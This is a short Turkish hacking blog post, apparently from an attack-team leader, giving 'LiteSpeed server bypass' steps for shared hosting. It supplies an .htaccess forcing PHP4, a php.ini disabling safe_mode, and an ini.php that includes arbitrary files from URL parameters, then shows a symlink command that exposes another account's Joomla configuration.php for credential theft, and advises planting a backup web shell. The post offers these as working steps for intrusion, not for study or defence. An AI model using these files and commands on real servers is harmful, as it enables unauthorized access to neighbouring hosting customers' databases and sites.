15 Mayıs 2015 Cuma

LiteSpeed server bypass komutları

.htaccess
Kod:
<Files *.php> 
ForceType application/x-httpd-php4 
</Files>
php.ini


Kod:
safe_mode = OFF
ini.php


Kod:
<? 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include($_GET["file"]); 
ini_restore("safe_mode"); 
ini_restore("open_basedir"); 
echo ini_get("safe_mode"); 
echo ini_get("open_basedir"); 
include($_GET["ss"]); 
?>
Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin


/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta


/home/bk:/usr/local/cpanel/bin/noshell
/home/bk2:/usr/local/cpanel/bin/noshell
/home/bk3:/usr/local/cpanel/bin/noshell
/home/bk4:/usr/local/cpanel/bin/noshell
/home/bk5:/usr/local/cpanel/bin/noshell
/home/bk6:/usr/local/cpanel/bin/noshell




hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden /home/bk/public_html/
bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi


eğer joomla ise


ln -s //home/bk/public_html/configration.php pose.shtml


diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz


NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın


Hiç yorum yok :

Yorum Gönder

Hakkımda

Uzun zamandır hack ve güvenlik camiası içerisindeyim.

bir çok projede yer aldım. Bir çok insan tanıtım Ve yine bir çok hack forumunda başkanlık, adminlik yaptım.

Şuanda

Alsancaktim.com'da Efeler Saldırı Timi Başkanlıgı yapıyorum.

Hack ruhunun dogasında paylaşmak vardır.

Bu blog paylaşım amaçlıdır !

Reklam

Popular Posts

Designed By CengizHan